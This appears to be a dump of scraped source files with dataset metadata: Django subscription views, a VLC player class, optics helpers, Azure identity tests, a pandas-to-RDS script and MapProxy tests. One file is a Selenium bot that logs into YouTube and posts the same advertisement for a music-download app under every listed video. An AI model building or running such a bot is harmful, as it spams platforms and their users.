( sub is not None and str(sub.user.primary_email).lower() == email.lower() ): sub.delete() msg = "<h1>Unsubscribed</h1>" return HttpResponse(msg, content_type="text/html", charset="utf-8") class SubscriptionDetailView(generics.RetrieveAPIView): """ get: Get an overview of the requesting user's Know Me premium subscription. """ permission_classes = (IsAuthenticated,) serializer_class = subscription_serializers.SubscriptionSerializer def get_object(self): """ Returns: The subscription instance owned by the requesting user. Raises: Http404: If the requesting user does not have a subscription instance. """ return get_object_or_404(models.Subscription, user=self.request.user) class SubscriptionTransferView(generics.CreateAPIView): """ post: Transfer a Know Me premium subscription to another user. Requirements: * The authenticated user must have an active Know Me premium subscription. * The specified recipient email address must exist in the system and be verified. * The recipient must not have an active premium subscription. """ permission_classes = (permissions.HasPremium,) serializer_class = subscription_serializers.SubscriptionTransferSerializer
en
0.822414
Views for the ``know_me`` module. post: Determine if an Apple receipt is already in use. If a valid Apple receipt is passed to the endpoint, the response will contain an `is_used` key indicating if the receipt is in use. If it is in use, the `email` key of the response will contain the primary email address of the owner of the receipt. If the provided receipt is invalid, a 400 response will be returned. Override the response returned from the parent class' ``create`` method to have a 200 status code. delete: Delete the Apple receipt associated with the requesting user's Know Me premium subscription. Deleting the receipt will also immediately deactivate the user's premium subscription. get: Retrieve the current user's Apple subscription. If the user does not have an Apple subscription, a 404 response is returned. put: Set the Apple subscription for the current user by providing the receipt from Apple for the purchase. Get the Apple subscription data instance that belongs to the requesting user. Returns: The ``AppleReceipt`` instance that belongs to the requesting user. Delete the requesting user's Apple receipt and deactivate their premium subscription. Args: instance: The Apple receipt data to delete. # If the user has an existing Apple subscription, update it # Validate the data provided to the serializer before we create # the base subscription (if necessary). post: Accept the accessor with the specified ID. Only the user granted access by the accessor may accept it. # We use the global permissions check because the normal check # assumes we're checking write permissions for a POST request. # We need a serializer class because dry-rest-permissions uses the # serializer to determine the model used for the view. Check permissions on the accessor being accessed. Only the user granted access by the accessor has permission to accept the accessor. Args: request: The request being made. obj: The ``KMUserAccessor`` instance being accepted. get: Retrieve the accessors granting the requesting user access to other users' accounts that have been accepted. Get the accessors accepted by the requesting user. Returns: A queryset containing the accessors accepted by the requesting user. get: Endpoint for retrieving the details of a specific accessor. put: Endpoint for updating an accessor. patch: Endpoint for partially updating an accessor. delete: Endpoint for deleting a specific accessor. Get the accessors accessible to the requesting user. Returns: A queryset containing the ``KMUserAccessor`` instances belonging to the requesting user. get: Endpoint for listing the accessors that grant access to the current user's Know Me profiles. *__Note:__ The requesting user must have an active premium subscription to access this view.* post: Endpoint for creating a new accessor for the current user's profiles. *__Note:__ The requesting user must have an active premium subscription to access this view.* Get the accessors for the user with the given PK. Returns: A queryset containing the ``KMUserAccessor`` instances belonging to the Know Me user whose PK was passed to the view. Create a new accessor for the current user. Args: serializer: The serializer containing the received data. Returns: The newly created ``KMUserAccessor`` instance. get: Retrieve the configuration for the Know Me app. patch: Partially update the configuration for Know Me. Only staff users may perform this action. put: Update the configuration for Know Me. Only staff users may perform this action. Return the config instance singleton. get: Endpoint for retrieving the details of a specific Know Me user. put: Endpoint for updating the details of a specific Know Me user. patch: Endpoint for partially updating the details of a specific Know Me user. get: Endpoint for listing the Know Me users that the current user has access to. The Know Me user owned by the requesting user is guaranteed to be the first element returned. Get the list of Know Me users the requesting user has access to. Returns: A queryset containing the ``KMUser`` instances accessible to the requesting user. # User granted access through an accessor. Note that the owner # of the Know Me user being shared must have an active premium # subscription. # If the premium requirement is enabled, the shared user must # have an active premium subscription. # noqa # Requesting user is the user # Allow us to sort the query with the requesting user's Know Me # user first. See conditional expression documentation: # https://docs.djangoproject.com/en/dev/ref/models/conditional-expressions/ delete: Delete the specified legacy user. get: Retrieve the specified legacy user's information. patch: Partially update the specified legacy user's information. put: Update the specified legacy user's information. get: Get a list of all legacy users. post: Add a new legacy user. Endpoint for listing the accessors that the current user can accept. Get the list of pending accessors for the requesting user. Returns: A queryset containing the ``KMUserAccessor`` instances that give access to the requesting user and are not yet accepted. delete: Delete a specific reminder email subscription. get: Retrieve a specific reminder email subscription's information. patch: Partially update a specific reminder email subscription's information. put: Update a specific reminder email subscription's information. Returns: The email reminder subscription instance owned by the requesting user. Raises: Http404: If the requesting user does not have a subscription instance. Endpoint for listing reminder email subscribers Get the reminder email subscription for the current user. Returns: A queryset containing the ``ReminderEmailSubscriber`` instances belonging to the user whose PK was passed to the view. Create a reminder email subscriber for the current user. Args: serializer: The serializer containing the received data. Returns: The newly created ``ReminderEmailSubscriber`` instance. Endpoint for unsubscribing to email reminders through email link. get: Get an overview of the requesting user's Know Me premium subscription. Returns: The subscription instance owned by the requesting user. Raises: Http404: If the requesting user does not have a subscription instance. post: Transfer a Know Me premium subscription to another user. Requirements: * The authenticated user must have an active Know Me premium subscription. * The specified recipient email address must exist in the system and be verified. * The recipient must not have an active premium subscription.
2.203823
2
commentbot/commentbot.py
cmccvic/CBOnetwork
0
6629009
<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- # Python bot for comment a list of urls in YouTube import time import numpy as np from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.keys import Keys from selenium.common.exceptions import NoSuchElementException from selenium.webdriver.firefox.firefox_binary import FirefoxBinary def youtube_login(email, password): # Browser binary = FirefoxBinary('C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe') driver = webdriver.Firefox(firefox_binary=binary) driver.get( 'https://accounts.google.com/ServiceLogin?hl=tr&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fhl%3Den%26feature%3Dsign_in_button%26app%3Ddesktop%26action_handle_signin%3Dtrue%26next%3D%252F&uilel=3&passive=true&service=youtube#identifier') # find email, send data and submit EMAIL_FIELD = driver.find_element_by_id('identifierId') EMAIL_FIELD.click() EMAIL_FIELD.clear() EMAIL_FIELD.send_keys(email) EMAIL_FIELD.send_keys(Keys.ENTER) time.sleep(3) driver.find_element_by_class_name('CeoRYc').click() time.sleep(4) # find password, send data and submit PASSWD_FIELD = driver.find_element_by_name('password') PASSWD_FIELD.click() PASSWD_FIELD.clear() PASSWD_FIELD.send_keys(password) PASSWD_FIELD.send_keys(Keys.ENTER) time.sleep(3) time.sleep(3) return driver def comment_page(driver, urls, comment): # Check if there still urls if len(urls) == 0: print 'Youtube Comment Bot: Finished!' return [] # Pop a URL from the array url = urls.pop() # Visite the page driver.get(url) driver.implicitly_wait(1) # Is video avaliable (deleted,private) ? if not check_exists_by_xpath(driver, '//*[@id="movie_player"]'): return comment_page(driver, urls, random_comment()) # Scroll, wait for load comment box driver.execute_script("window.scrollTo(0, 500);") # Comments are disabled? if check_exists_by_xpath(driver, '//*[@id="comments-disabled-message"]/div/span'): return comment_page(driver, urls, random_comment()) # Lets wait for comment box WebDriverWait(driver, 15).until(EC.presence_of_element_located((By.ID, "comment-section-renderer"))) # Activate box for comments driver.find_element_by_class_name('comment-simplebox-renderer-collapsed-content').click() # driver.find_element_by_xpath("//div[@id='comment-section-renderer']/div/div[2]/div").click() # Send comment and post driver.implicitly_wait(5) driver.find_element_by_xpath('//*[@id="comment-simplebox"]/div[1]').send_keys(_convert(comment)) driver.find_element_by_xpath('//*[@id="comment-simplebox"]/div[1]').send_keys(Keys.ENTER + Keys.ENTER) # Is post ready to be clicked? comment-simplebox-submit driver.find_element_by_class_name('comment-simplebox-submit').click() # Lets wait a bit r = np.random.randint(2, 5) time.sleep(r) # Recursive return comment_page(driver, urls, random_comment()) def _convert(param): if isinstance(param, str): return param.decode('utf-8') else: return param def random_comment(): messages = [ 'Müzik Caddesi Uyguluması müzik indirme ve dinleme programı telefonuza şarkı keyfi yaşatır. Google Play\'den indirebilir veya https://play.google.com/store/apps/details?id=com.muzikcaddesi.muzikcaddesi' ] r = np.random.randint(0, len(messages)) return messages[r] def check_exists_by_xpath(driver, xpath): try: driver.find_element_by_xpath(xpath) except NoSuchElementException: return False return True if __name__ == '__main__': # Credentials email = '' password = '' # List of Urls # urls = [ # 'https://www.youtube.com/watch?v=qbrvM61MUAY', # ] urls = [''] # You can add in a file and import from there inp = open("urls.txt", "r") for line in inp.readlines(): yeni_url = line.split() for current_word in yeni_url: urls.append(current_word) # Login in youtube driver = youtube_login(email, password) # Random comment comment_page(driver, urls, random_comment())
#!/usr/bin/env python # -*- coding: utf-8 -*- # Python bot for comment a list of urls in YouTube import time import numpy as np from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.keys import Keys from selenium.common.exceptions import NoSuchElementException from selenium.webdriver.firefox.firefox_binary import FirefoxBinary def youtube_login(email, password): # Browser binary = FirefoxBinary('C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe') driver = webdriver.Firefox(firefox_binary=binary) driver.get( 'https://accounts.google.com/ServiceLogin?hl=tr&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fhl%3Den%26feature%3Dsign_in_button%26app%3Ddesktop%26action_handle_signin%3Dtrue%26next%3D%252F&uilel=3&passive=true&service=youtube#identifier') # find email, send data and submit EMAIL_FIELD = driver.find_element_by_id('identifierId') EMAIL_FIELD.click() EMAIL_FIELD.clear() EMAIL_FIELD.send_keys(email) EMAIL_FIELD.send_keys(Keys.ENTER) time.sleep(3) driver.find_element_by_class_name('CeoRYc').click() time.sleep(4) # find password, send data and submit PASSWD_FIELD = driver.find_element_by_name('password') PASSWD_FIELD.click() PASSWD_FIELD.clear() PASSWD_FIELD.send_keys(password) PASSWD_FIELD.send_keys(Keys.ENTER) time.sleep(3) time.sleep(3) return driver def comment_page(driver, urls, comment): # Check if there still urls if len(urls) == 0: print 'Youtube Comment Bot: Finished!' return [] # Pop a URL from the array url = urls.pop() # Visite the page driver.get(url) driver.implicitly_wait(1) # Is video avaliable (deleted,private) ? if not check_exists_by_xpath(driver, '//*[@id="movie_player"]'): return comment_page(driver, urls, random_comment()) # Scroll, wait for load comment box driver.execute_script("window.scrollTo(0, 500);") # Comments are disabled? if check_exists_by_xpath(driver, '//*[@id="comments-disabled-message"]/div/span'): return comment_page(driver, urls, random_comment()) # Lets wait for comment box WebDriverWait(driver, 15).until(EC.presence_of_element_located((By.ID, "comment-section-renderer"))) # Activate box for comments driver.find_element_by_class_name('comment-simplebox-renderer-collapsed-content').click() # driver.find_element_by_xpath("//div[@id='comment-section-renderer']/div/div[2]/div").click() # Send comment and post driver.implicitly_wait(5) driver.find_element_by_xpath('//*[@id="comment-simplebox"]/div[1]').send_keys(_convert(comment)) driver.find_element_by_xpath('//*[@id="comment-simplebox"]/div[1]').send_keys(Keys.ENTER + Keys.ENTER) # Is post ready to be clicked? comment-simplebox-submit driver.find_element_by_class_name('comment-simplebox-submit').click() # Lets wait a bit r = np.random.randint(2, 5) time.sleep(r) # Recursive return comment_page(driver, urls, random_comment()) def _convert(param): if isinstance(param, str): return param.decode('utf-8') else: return param def random_comment(): messages = [ 'Müzik Caddesi Uyguluması müzik indirme ve dinleme programı telefonuza şarkı keyfi yaşatır. Google Play\'den indirebilir veya https://play.google.com/store/apps/details?id=com.muzikcaddesi.muzikcaddesi' ] r = np.random.randint(0, len(messages)) return messages[r] def check_exists_by_xpath(driver, xpath): try: driver.find_element_by_xpath(xpath) except NoSuchElementException: return False return True if __name__ == '__main__': # Credentials email = '' password = '' # List of Urls # urls = [ # 'https://www.youtube.com/watch?v=qbrvM61MUAY', # ] urls = [''] # You can add in a file and import from there inp = open("urls.txt", "r") for line in inp.readlines(): yeni_url = line.split() for current_word in yeni_url: urls.append(current_word) # Login in youtube driver = youtube_login(email, password) # Random comment comment_page(driver, urls, random_comment())
en
0.67824
#!/usr/bin/env python # -*- coding: utf-8 -*- # Python bot for comment a list of urls in YouTube # Browser #identifier') # find email, send data and submit # find password, send data and submit # Check if there still urls # Pop a URL from the array # Visite the page # Is video avaliable (deleted,private) ? # Scroll, wait for load comment box # Comments are disabled? # Lets wait for comment box # Activate box for comments # driver.find_element_by_xpath("//div[@id='comment-section-renderer']/div/div[2]/div").click() # Send comment and post # Is post ready to be clicked? comment-simplebox-submit # Lets wait a bit # Recursive # Credentials # List of Urls # urls = [ # 'https://www.youtube.com/watch?v=qbrvM61MUAY', # ] # You can add in a file and import from there # Login in youtube # Random comment
2.920219
3
Digital Holographic Refocusing/myfunctions.py
monakhova/Fourier-Optics-Demos
8
6629010
<filename>Digital Holographic Refocusing/myfunctions.py # Functions def rgb2gray(rgb): import numpy as np return np.dot(rgb[...,:3], [0.299, 0.587, 0.114]) def contrast(g_in): import numpy as np I_max = np.max(np.abs(g_in)**2) I_min = np.min(np.abs(g_in)**2) C = (I_max - I_min)/(I_max+I_min) return(C) def propagate(ein, lmda, z, ps): import numpy as np # Digitally refocuses a complex field a given distance, z. # (ref pg 67,<NAME>, Introduction to Fourier Optics) #inputs: # ein - complex field at input plane # lmda - wavelength of light [um] # z - vector of propagation distances [um] # ps - pixel size [um] [m,n]=ein.shape; M = m; N= n; eout = np.zeros([m,n,z.shape[0]])*1j; f_metric = np.zeros([z.shape[0]])*1j; Hout = np.zeros([m,n,z.shape[0]])*1j; # Spatial Sampling [x,y]=np.meshgrid(np.arange(-n/2, n/2), np.arange(-m/2, m/2)); fx=(x/(ps*M)); #frequency space width [1/m] fy=(y/(ps*N)); #frequency space height [1/m] fx2fy2 = fx**2 + fy**2; # Padding value ein_pad = ein; E0fft = np.fft.fftshift(np.fft.fft2(ein_pad)); mask = 1; for z_ind in range(0,z.shape[0]): H = np.exp(-1j*np.pi*lmda*z[z_ind]*fx2fy2); Eout_pad=np.fft.ifft2(np.fft.ifftshift(E0fft*H*mask)); f_metric[z_ind] = np.linalg.norm(np.real(H)*2*np.real(H)*E0fft,1) eout[:,:,z_ind]=Eout_pad Hout[:,:,z_ind]=H.copy() return(eout, Hout, f_metric) def interactive_slider(image, title): # Makes an interactive slider from ipywidgets import widgets import matplotlib.pyplot as plt # For making figures def slice_through_images(image): def slice_step(i_step): fig, axes = plt.subplots(figsize=(10, 5)) axes.imshow(image[:,:,i_step], cmap='gray') plt.title(title) plt.colorbar plt.show() return slice_step stepper = slice_through_images(image) widgets.interact(stepper, i_step=(0, image.shape[2]-1)) def imshowAnim(myimage, zs, niter, imsize): # Function to generate animated video import matplotlib.pyplot as plt # For making figures import numpy as np # Standard NumPy library from matplotlib import animation, rc # Used for inline animations from IPython.display import HTML # Used for inline animations fig = plt.figure(); fig=plt.figure(figsize=(imsize, imsize), dpi= 100, facecolor='w', edgecolor='k'); a = (myimage[:,:,0]); im=plt.imshow(np.abs(myimage[:,:,0]), extent=[0, 1, 0, 1], vmin=np.min(myimage[:,:,0]), vmax=np.max(myimage[:,:,0])); ttl = plt.title(('Image # %s'%(1))); plt.axis('off'); plt.close(); def init(): im.set_data(np.abs(myimage[:,:,0])); return [im] # animation function. This is called sequentially def animate(i): a = np.abs(myimage[:,:,i]); im.set_array(a); im.set_cmap('gray') ttl.set_text(('Defocus %s (um)'%(zs[i]))); # Change text return [im, ttl] # call the animator. blit=True means only re-draw the parts that have changed. anim = animation.FuncAnimation(fig, animate, init_func=init, frames=niter, interval=200); return(HTML(anim.to_html5_video()));
<filename>Digital Holographic Refocusing/myfunctions.py # Functions def rgb2gray(rgb): import numpy as np return np.dot(rgb[...,:3], [0.299, 0.587, 0.114]) def contrast(g_in): import numpy as np I_max = np.max(np.abs(g_in)**2) I_min = np.min(np.abs(g_in)**2) C = (I_max - I_min)/(I_max+I_min) return(C) def propagate(ein, lmda, z, ps): import numpy as np # Digitally refocuses a complex field a given distance, z. # (ref pg 67,<NAME>, Introduction to Fourier Optics) #inputs: # ein - complex field at input plane # lmda - wavelength of light [um] # z - vector of propagation distances [um] # ps - pixel size [um] [m,n]=ein.shape; M = m; N= n; eout = np.zeros([m,n,z.shape[0]])*1j; f_metric = np.zeros([z.shape[0]])*1j; Hout = np.zeros([m,n,z.shape[0]])*1j; # Spatial Sampling [x,y]=np.meshgrid(np.arange(-n/2, n/2), np.arange(-m/2, m/2)); fx=(x/(ps*M)); #frequency space width [1/m] fy=(y/(ps*N)); #frequency space height [1/m] fx2fy2 = fx**2 + fy**2; # Padding value ein_pad = ein; E0fft = np.fft.fftshift(np.fft.fft2(ein_pad)); mask = 1; for z_ind in range(0,z.shape[0]): H = np.exp(-1j*np.pi*lmda*z[z_ind]*fx2fy2); Eout_pad=np.fft.ifft2(np.fft.ifftshift(E0fft*H*mask)); f_metric[z_ind] = np.linalg.norm(np.real(H)*2*np.real(H)*E0fft,1) eout[:,:,z_ind]=Eout_pad Hout[:,:,z_ind]=H.copy() return(eout, Hout, f_metric) def interactive_slider(image, title): # Makes an interactive slider from ipywidgets import widgets import matplotlib.pyplot as plt # For making figures def slice_through_images(image): def slice_step(i_step): fig, axes = plt.subplots(figsize=(10, 5)) axes.imshow(image[:,:,i_step], cmap='gray') plt.title(title) plt.colorbar plt.show() return slice_step stepper = slice_through_images(image) widgets.interact(stepper, i_step=(0, image.shape[2]-1)) def imshowAnim(myimage, zs, niter, imsize): # Function to generate animated video import matplotlib.pyplot as plt # For making figures import numpy as np # Standard NumPy library from matplotlib import animation, rc # Used for inline animations from IPython.display import HTML # Used for inline animations fig = plt.figure(); fig=plt.figure(figsize=(imsize, imsize), dpi= 100, facecolor='w', edgecolor='k'); a = (myimage[:,:,0]); im=plt.imshow(np.abs(myimage[:,:,0]), extent=[0, 1, 0, 1], vmin=np.min(myimage[:,:,0]), vmax=np.max(myimage[:,:,0])); ttl = plt.title(('Image # %s'%(1))); plt.axis('off'); plt.close(); def init(): im.set_data(np.abs(myimage[:,:,0])); return [im] # animation function. This is called sequentially def animate(i): a = np.abs(myimage[:,:,i]); im.set_array(a); im.set_cmap('gray') ttl.set_text(('Defocus %s (um)'%(zs[i]))); # Change text return [im, ttl] # call the animator. blit=True means only re-draw the parts that have changed. anim = animation.FuncAnimation(fig, animate, init_func=init, frames=niter, interval=200); return(HTML(anim.to_html5_video()));
en
0.729042
# Functions # Digitally refocuses a complex field a given distance, z. # (ref pg 67,<NAME>, Introduction to Fourier Optics) #inputs: # ein - complex field at input plane # lmda - wavelength of light [um] # z - vector of propagation distances [um] # ps - pixel size [um] # Spatial Sampling #frequency space width [1/m] #frequency space height [1/m] # Padding value # Makes an interactive slider # For making figures # Function to generate animated video # For making figures # Standard NumPy library # Used for inline animations # Used for inline animations # %s'%(1))); # animation function. This is called sequentially # Change text # call the animator. blit=True means only re-draw the parts that have changed.
3.127892
3
Source/MediaPlayer.py
matias225/mp3TagEditor
0
6629011
import vlc from PyQt5 import QtWidgets import os class MediaPlayer(QtWidgets.QMainWindow): def __init__(self, *args, **kwargs): QtWidgets.QMainWindow.__init__(self, *args, **kwargs) self.instance = vlc.Instance() self.mediaplayer = self.instance.media_player_new() self.is_paused = False self.is_play = False self.media = None self.path = None def play_pause(self): if self.is_playing(): self.mediaplayer.pause() self.is_paused = True self.is_play = False else: if self.mediaplayer.play() == -1: self.media = self.instance.media_new(self.path) self.mediaplayer.set_media(self.media) self.mediaplayer.play() self.is_paused = False self.is_play = True def stop(self): self.mediaplayer.stop() def set_volume(self, volume): self.mediaplayer.audio_set_volume(volume) def set_path(self, path): self.path = path def get_path(self): return self.path def is_playing(self): return self.is_play def open_file(self, path): if not path: dialog_txt = "Elija el archivo a reproducir" path = QtWidgets.QFileDialog.getOpenFileName(self, dialog_txt, os.path.expanduser('~/mp3TagEditor'))[0] if not path: return self.media = self.instance.media_new(path) self.mediaplayer.set_media(self.media) self.media.parse() self.play_pause()
import vlc from PyQt5 import QtWidgets import os class MediaPlayer(QtWidgets.QMainWindow): def __init__(self, *args, **kwargs): QtWidgets.QMainWindow.__init__(self, *args, **kwargs) self.instance = vlc.Instance() self.mediaplayer = self.instance.media_player_new() self.is_paused = False self.is_play = False self.media = None self.path = None def play_pause(self): if self.is_playing(): self.mediaplayer.pause() self.is_paused = True self.is_play = False else: if self.mediaplayer.play() == -1: self.media = self.instance.media_new(self.path) self.mediaplayer.set_media(self.media) self.mediaplayer.play() self.is_paused = False self.is_play = True def stop(self): self.mediaplayer.stop() def set_volume(self, volume): self.mediaplayer.audio_set_volume(volume) def set_path(self, path): self.path = path def get_path(self): return self.path def is_playing(self): return self.is_play def open_file(self, path): if not path: dialog_txt = "Elija el archivo a reproducir" path = QtWidgets.QFileDialog.getOpenFileName(self, dialog_txt, os.path.expanduser('~/mp3TagEditor'))[0] if not path: return self.media = self.instance.media_new(path) self.mediaplayer.set_media(self.media) self.media.parse() self.play_pause()
none
1
2.848945
3
sdk/identity/azure-identity/tests/test_username_password_credential.py
szaher/azure-sdk-for-python
0
6629012
# ------------------------------------ # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. # ------------------------------------ from azure.core.exceptions import ClientAuthenticationError from azure.core.pipeline.policies import ContentDecodePolicy, SansIOHTTPPolicy from azure.identity import UsernamePasswordCredential from azure.identity._internal.user_agent import USER_AGENT import pytest from helpers import build_aad_response, get_discovery_response, mock_response, Request, validating_transport try: from unittest.mock import Mock except ImportError: # python < 3.3 from mock import Mock # type: ignore def test_no_scopes(): """The credential should raise when get_token is called with no scopes""" credential = UsernamePasswordCredential("client-id", "username", "password") with pytest.raises(ClientAuthenticationError): credential.get_token() def test_policies_configurable(): policy = Mock(spec_set=SansIOHTTPPolicy, on_request=Mock()) transport = validating_transport( requests=[Request()] * 3, responses=[get_discovery_response()] * 2 + [mock_response(json_payload=build_aad_response(access_token="**"))], ) credential = UsernamePasswordCredential("client-id", "username", "password", policies=[policy], transport=transport) credential.get_token("scope") assert policy.on_request.called def test_user_agent(): transport = validating_transport( requests=[Request()] * 2 + [Request(required_headers={"User-Agent": USER_AGENT})], responses=[get_discovery_response()] * 2 + [mock_response(json_payload=build_aad_response(access_token="**"))], ) credential = UsernamePasswordCredential("client-id", "username", "password", transport=transport) credential.get_token("scope") def test_username_password_credential(): expected_token = "access-token" transport = validating_transport( requests=[Request()] * 3, # not validating requests because they're formed by MSAL responses=[ # tenant discovery mock_response(json_payload={"authorization_endpoint": "https://a/b", "token_endpoint": "https://a/b"}), # user realm discovery, interests MSAL only when the response body contains account_type == "Federated" mock_response(json_payload={}), # token request mock_response( json_payload={ "access_token": expected_token, "expires_in": 42, "token_type": "Bearer", "ext_expires_in": 42, } ), ], ) credential = UsernamePasswordCredential( client_id="some-guid", username="user@azure", password="<PASSWORD>", transport=transport, instance_discovery=False, # kwargs are passed to MSAL; this one prevents an AAD verification request ) token = credential.get_token("scope") assert token.token == expected_token
# ------------------------------------ # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. # ------------------------------------ from azure.core.exceptions import ClientAuthenticationError from azure.core.pipeline.policies import ContentDecodePolicy, SansIOHTTPPolicy from azure.identity import UsernamePasswordCredential from azure.identity._internal.user_agent import USER_AGENT import pytest from helpers import build_aad_response, get_discovery_response, mock_response, Request, validating_transport try: from unittest.mock import Mock except ImportError: # python < 3.3 from mock import Mock # type: ignore def test_no_scopes(): """The credential should raise when get_token is called with no scopes""" credential = UsernamePasswordCredential("client-id", "username", "password") with pytest.raises(ClientAuthenticationError): credential.get_token() def test_policies_configurable(): policy = Mock(spec_set=SansIOHTTPPolicy, on_request=Mock()) transport = validating_transport( requests=[Request()] * 3, responses=[get_discovery_response()] * 2 + [mock_response(json_payload=build_aad_response(access_token="**"))], ) credential = UsernamePasswordCredential("client-id", "username", "password", policies=[policy], transport=transport) credential.get_token("scope") assert policy.on_request.called def test_user_agent(): transport = validating_transport( requests=[Request()] * 2 + [Request(required_headers={"User-Agent": USER_AGENT})], responses=[get_discovery_response()] * 2 + [mock_response(json_payload=build_aad_response(access_token="**"))], ) credential = UsernamePasswordCredential("client-id", "username", "password", transport=transport) credential.get_token("scope") def test_username_password_credential(): expected_token = "access-token" transport = validating_transport( requests=[Request()] * 3, # not validating requests because they're formed by MSAL responses=[ # tenant discovery mock_response(json_payload={"authorization_endpoint": "https://a/b", "token_endpoint": "https://a/b"}), # user realm discovery, interests MSAL only when the response body contains account_type == "Federated" mock_response(json_payload={}), # token request mock_response( json_payload={ "access_token": expected_token, "expires_in": 42, "token_type": "Bearer", "ext_expires_in": 42, } ), ], ) credential = UsernamePasswordCredential( client_id="some-guid", username="user@azure", password="<PASSWORD>", transport=transport, instance_discovery=False, # kwargs are passed to MSAL; this one prevents an AAD verification request ) token = credential.get_token("scope") assert token.token == expected_token
en
0.782511
# ------------------------------------ # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. # ------------------------------------ # python < 3.3 # type: ignore The credential should raise when get_token is called with no scopes # not validating requests because they're formed by MSAL # tenant discovery # user realm discovery, interests MSAL only when the response body contains account_type == "Federated" # token request # kwargs are passed to MSAL; this one prevents an AAD verification request
2.106439
2
jind/df_to_rds.py
mohit1997/JIND
11
6629013
<reponame>mohit1997/JIND import pandas as pd import rpy2 from rpy2 import robjects from rpy2.robjects import pandas2ri import numpy as np import argparse import pickle parser = argparse.ArgumentParser() parser.add_argument('-d', action='store', default=None, dest='data', help='choose dataframe pickle file') parser.add_argument('-output', action='store', default=None, dest='output', help='name of the rds file') def convert_to_rds(df, filename): pandas2ri.activate() r_frame = robjects.conversion.py2rpy(df) robjects.r.assign("my_df", r_frame) robjects.r("saveRDS(my_df, file='{}')".format(filename)) if __name__ == "__main__": args = parser.parse_args() print(args) with open(args.data, 'rb') as f: data = pickle.load(f) convert_to_rds(data, args.output)
import pandas as pd import rpy2 from rpy2 import robjects from rpy2.robjects import pandas2ri import numpy as np import argparse import pickle parser = argparse.ArgumentParser() parser.add_argument('-d', action='store', default=None, dest='data', help='choose dataframe pickle file') parser.add_argument('-output', action='store', default=None, dest='output', help='name of the rds file') def convert_to_rds(df, filename): pandas2ri.activate() r_frame = robjects.conversion.py2rpy(df) robjects.r.assign("my_df", r_frame) robjects.r("saveRDS(my_df, file='{}')".format(filename)) if __name__ == "__main__": args = parser.parse_args() print(args) with open(args.data, 'rb') as f: data = pickle.load(f) convert_to_rds(data, args.output)
none
1
3.108344
3
mapproxy/test/system/test_cache_mbtiles.py
cunha17/mapproxy
347
6629014
# This file is part of the MapProxy project. # Copyright (C) 2011 Omniscale <http://omniscale.de> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import division import os import shutil from io import BytesIO from mapproxy.request.wms import WMS111MapRequest from mapproxy.test.http import MockServ from mapproxy.test.image import is_png, create_tmp_image from mapproxy.test.system import SysTest import pytest @pytest.fixture(scope="module") def config_file(): return "cache_mbtiles.yaml" @pytest.fixture(scope="class") def fixture_gpkg(base_dir): shutil.copy( os.path.join(os.path.dirname(__file__), "fixture", "cache.mbtiles"), base_dir.strpath, ) @pytest.mark.usefixtures("fixture_gpkg") class TestMBTilesCache(SysTest): def setup(self): self.common_map_req = WMS111MapRequest( url="/service?", param=dict( service="WMS", version="1.1.1", bbox="-180,-80,0,0", width="200", height="200", layers="mb", srs="EPSG:4326", format="image/png", styles="", request="GetMap", ), ) def test_get_map_cached(self, app): resp = app.get(self.common_map_req) assert resp.content_type == "image/png" data = BytesIO(resp.body) assert is_png(data) def test_get_map_uncached(self, app): self.common_map_req.params.bbox = "-180,0,0,80" serv = MockServ(port=42423) serv.expects("/tiles/01/000/000/000/000/000/001.png") serv.returns(create_tmp_image((256, 256))) with serv: resp = app.get(self.common_map_req) assert resp.content_type == "image/png" data = BytesIO(resp.body) assert is_png(data) # now cached resp = app.get(self.common_map_req) assert resp.content_type == "image/png" data = BytesIO(resp.body) assert is_png(data)
# This file is part of the MapProxy project. # Copyright (C) 2011 Omniscale <http://omniscale.de> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import division import os import shutil from io import BytesIO from mapproxy.request.wms import WMS111MapRequest from mapproxy.test.http import MockServ from mapproxy.test.image import is_png, create_tmp_image from mapproxy.test.system import SysTest import pytest @pytest.fixture(scope="module") def config_file(): return "cache_mbtiles.yaml" @pytest.fixture(scope="class") def fixture_gpkg(base_dir): shutil.copy( os.path.join(os.path.dirname(__file__), "fixture", "cache.mbtiles"), base_dir.strpath, ) @pytest.mark.usefixtures("fixture_gpkg") class TestMBTilesCache(SysTest): def setup(self): self.common_map_req = WMS111MapRequest( url="/service?", param=dict( service="WMS", version="1.1.1", bbox="-180,-80,0,0", width="200", height="200", layers="mb", srs="EPSG:4326", format="image/png", styles="", request="GetMap", ), ) def test_get_map_cached(self, app): resp = app.get(self.common_map_req) assert resp.content_type == "image/png" data = BytesIO(resp.body) assert is_png(data) def test_get_map_uncached(self, app): self.common_map_req.params.bbox = "-180,0,0,80" serv = MockServ(port=42423) serv.expects("/tiles/01/000/000/000/000/000/001.png") serv.returns(create_tmp_image((256, 256))) with serv: resp = app.get(self.common_map_req) assert resp.content_type == "image/png" data = BytesIO(resp.body) assert is_png(data) # now cached resp = app.get(self.common_map_req) assert resp.content_type == "image/png" data = BytesIO(resp.body) assert is_png(data)
en
0.835497
